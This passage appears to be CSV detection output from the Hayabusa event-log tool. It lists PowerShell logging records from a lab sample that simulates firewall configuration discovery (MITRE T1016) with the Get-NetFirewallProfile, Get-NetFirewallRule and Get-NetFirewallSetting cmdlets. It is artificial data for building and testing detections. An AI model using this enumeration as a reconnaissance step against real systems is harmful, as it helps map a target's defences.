}",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.364 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"param($x) if ($x.ToUpperInvariant().Equals(""NOTCONFIGURED"")) { $this.PSBase.CimInstanceProperties[""LogMaxSizeKilobytes""].Value = 4294967296; } else { $this.PSBase.CimInstanceProperties[""LogMaxSizeKilobytes""].Value = [uint32]$x; }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.364 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['LogAllowed'].Value + 0),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.364 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['LogAllowed'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.364 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock 
Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['LogBlocked'].Value + 0),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.364 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['LogBlocked'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.364 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['LogIgnored'].Value + 0),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.364 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['LogIgnored'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.473 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline 
Execution,"CommandInvocation(Get-NetFirewallProfile): ""Get-NetFirewallProfile"" ParameterBinding(Get-NetFirewallProfile): name=""Name""; value="""" ParameterBinding(Get-NetFirewallProfile): name=""AssociatedNetFirewallRule""; value="""" ParameterBinding(Get-NetFirewallProfile): name=""AssociatedNetIPsecRule""; value="""" ParameterBinding(Get-NetFirewallProfile): name=""AssociatedNetIPsecMainModeRule""; value="""" ParameterBinding(Get-NetFirewallProfile): name=""All""; value=""False"" ParameterBinding(Get-NetFirewallProfile): name=""PolicyStore""; value="""" ParameterBinding(Get-NetFirewallProfile): name=""GPOSession""; value="""" ParameterBinding(Get-NetFirewallProfile): name=""CimSession""; value="""" ParameterBinding(Get-NetFirewallProfile): name=""ThrottleLimit""; value=""0"" ParameterBinding(Get-NetFirewallProfile): name=""AsJob""; value=""False""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.489 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""MSFT_NetFirewallProfile (InstanceID = ""MSFT?FW?FirewallProfile?Domain"")"" ParameterBinding(Out-Default): name=""InputObject""; value=""MSFT_NetFirewallProfile (InstanceID = ""MSFT?FW?FirewallProfile?Private"")"" ParameterBinding(Out-Default): name=""InputObject""; value=""MSFT_NetFirewallProfile (InstanceID = ""MSFT?FW?FirewallProfile?Public"")""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.489 
+00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"[System.Diagnostics.DebuggerHidden()] param() $foundSuggestion = $false if($lastError -and ($lastError.Exception -is ""System.Management.Automation.CommandNotFoundException"")) { $escapedCommand = [System.Management.Automation.WildcardPattern]::Escape($lastError.TargetObject) $foundSuggestion = @(Get-Command ($ExecutionContext.SessionState.Path.Combine(""."", $escapedCommand)) -ErrorAction Ignore).Count -gt 0 } $foundSuggestion",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.489 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"""The command $($lastError.TargetObject) was not found, but does exist in the current location. Windows PowerShell does not load commands from the current location by default. If you trust this command, instead type `"".\$($lastError.TargetObject)`"". 
See `""get-help about_Command_Precedence`"" for more details.""",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.489 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:08.223 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Get-NetFirewallRule,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:08.239 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:08.317 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$this.PSBase.CimInstanceProperties[""DisplayName""].Value",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 
07:23:08.317 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"param($x) ; $this.PSBase.CimInstanceProperties[""DisplayName""].Value = $x ; $this.PSBase.CimInstanceProperties[""ElementName""].Value = $x",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:08.317 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled]($this.PSBase.CimInstanceProperties['Enabled'].Value + 0),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:08.317 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['Enabled'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled]$x,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:08.317 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile]($this.PSBase.CimInstanceProperties['Profiles'].Value + 0),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:08.317 
+00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['Profiles'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile]$x,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:08.317 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction]($this.PSBase.CimInstanceProperties['Direction'].Value + 0),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:08.317 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['Direction'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction]$x,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:08.317 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action]($this.PSBase.CimInstanceProperties['Action'].Value + 0),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:08.317 
+00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['Action'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action]$x,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:08.317 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal]($this.PSBase.CimInstanceProperties['EdgeTraversalPolicy'].Value + 0),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:08.317 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['EdgeTraversalPolicy'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal]$x,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:08.317 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus]($this.PSBase.CimInstanceProperties['PrimaryStatus'].Value + 0),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 
07:23:08.317 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['PrimaryStatus'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus]$x,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:08.317 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$this.PSBase.CimInstanceProperties[""Status""].Value + "" ("" + ($this.PSBase.CimInstanceProperties[""StatusCode""].Value + 0) + "")""",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:08.317 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"[Microsoft.Windows.Firewall.Commands.Formatting.Formatter]::FormatEnforcementStatus($this.PSBase.CimInstanceProperties[""EnforcementStatus""].Value)",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:08.317 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType]($this.PSBase.CimInstanceProperties['PolicyStoreSourceType'].Value + 0),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 
+2021-10-25 07:23:08.317 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['PolicyStoreSourceType'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType]$x,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:12.926 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-NetFirewallRule): ""Get-NetFirewallRule"" ParameterBinding(Get-NetFirewallRule): name=""Name""; value="""" ParameterBinding(Get-NetFirewallRule): name=""DisplayName""; value="""" ParameterBinding(Get-NetFirewallRule): name=""Description""; value="""" ParameterBinding(Get-NetFirewallRule): name=""DisplayGroup""; value="""" ParameterBinding(Get-NetFirewallRule): name=""Group""; value="""" ParameterBinding(Get-NetFirewallRule): name=""Enabled""; value="""" ParameterBinding(Get-NetFirewallRule): name=""Direction""; value="""" ParameterBinding(Get-NetFirewallRule): name=""Action""; value="""" ParameterBinding(Get-NetFirewallRule): name=""EdgeTraversalPolicy""; value="""" ParameterBinding(Get-NetFirewallRule): name=""LooseSourceMapping""; value="""" ParameterBinding(Get-NetFirewallRule): name=""LocalOnlyMapping""; value="""" ParameterBinding(Get-NetFirewallRule): name=""Owner""; value="""" ParameterBinding(Get-NetFirewallRule): name=""PrimaryStatus""; value="""" ParameterBinding(Get-NetFirewallRule): name=""Status""; value="""" ParameterBinding(Get-NetFirewallRule): name=""PolicyStoreSource""; value="""" ParameterBinding(Get-NetFirewallRule): name=""PolicyStoreSourceType""; value="""" ParameterBinding(Get-NetFirewallRule): name=""AssociatedNetFirewallAddressFilter""; value="""" ParameterBinding(Get-NetFirewallRule): 
name=""AssociatedNetFirewallApplicationFilter""; value="""" ParameterBinding(Get-NetFirewallRule): name=""AssociatedNetFirewallInterfaceFilter""; value="""" ParameterBinding(Get-NetFirewallRule): name=""AssociatedNetFirewallInterfaceTypeFilter""; value="""" ParameterBinding(Get-NetFirewallRule): name=""AssociatedNetFirewallPortFilter""; value="""" ParameterBinding(Get-NetFirewallRule): name=""AssociatedNetFirewallSecurityFilter""; value="""" ParameterBinding(Get-NetFirewallRule): name=""AssociatedNetFirewallServiceFilter""; value="""" ParameterBinding(Get-NetFirewallRule): name=""AssociatedNetFirewallProfile""; value="""" ParameterBinding(Get-NetFirewallRule): name=""All""; value=""False"" ParameterBinding(Get-NetFirewallRule): name=""PolicyStore""; value="""" ParameterBinding(Get-NetFirewallRule): name=""GPOSession""; value="""" ParameterBinding(Get-NetFirewallRule): name=""TracePolicyStore""; value=""False"" ParameterBinding(Get-NetFirewallRule): name=""CimSession""; value="""" ParameterBinding(Get-NetFirewallRule): name=""ThrottleLimit""; value=""0"" ParameterBinding(Get-NetFirewallRule): name=""AsJob""; value=""False"" TerminatingError(): ""The pipeline has been stopped.""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:12.926 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:13.770 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock 
Log,Get-NetFirewallSetting,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:13.786 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:13.801 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption]($this.PSBase.CimInstanceProperties['Exemptions'].Value + 0),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:13.801 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['Exemptions'].Value = [System.Uint32][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption]$x,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:13.801 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock 
Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['EnableStatefulFtp'].Value + 0),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:13.801 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['EnableStatefulFtp'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:13.801 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['EnableStatefulPptp'].Value + 0),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:13.801 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['EnableStatefulPptp'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:13.801 
+00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile]($this.PSBase.CimInstanceProperties['Profile'].Value + 0),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:13.801 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['Profile'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile]$x,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:13.801 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['RequireFullAuthSupport'].Value + 0),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:13.801 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['RequireFullAuthSupport'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:13.801 
+00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck]($this.PSBase.CimInstanceProperties['CertValidationLevel'].Value + 0),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:13.801 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['CertValidationLevel'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck]$x,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:13.801 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT]($this.PSBase.CimInstanceProperties['AllowIPsecThroughNAT'].Value + 0),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:13.801 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['AllowIPsecThroughNAT'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT]$x,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated 
